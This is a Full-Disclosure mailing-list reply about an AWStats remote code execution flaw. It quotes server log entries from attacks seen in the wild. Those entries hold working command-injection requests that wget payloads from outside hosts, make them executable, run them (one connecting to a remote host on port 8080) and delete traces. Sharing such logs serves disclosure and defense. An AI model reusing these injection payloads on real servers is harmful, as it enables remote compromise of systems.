Re: [ GLSA 200501-36 ] AWStats: Remote code execution

[Niels Bakker <niels-bugtraq () bakker net>]

* krustev () krustev net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET 
> /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00
>  HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET 
> /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00
>  HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

It's been out there for a while already:

208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET 
/cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527
 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"

Those files don't exist there anymore.


        -- Niels.

-- 
(please reply to niels=bugtraq@ instead of niels-bugtraq@ - except for
 the gazillion autoresponders of course)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html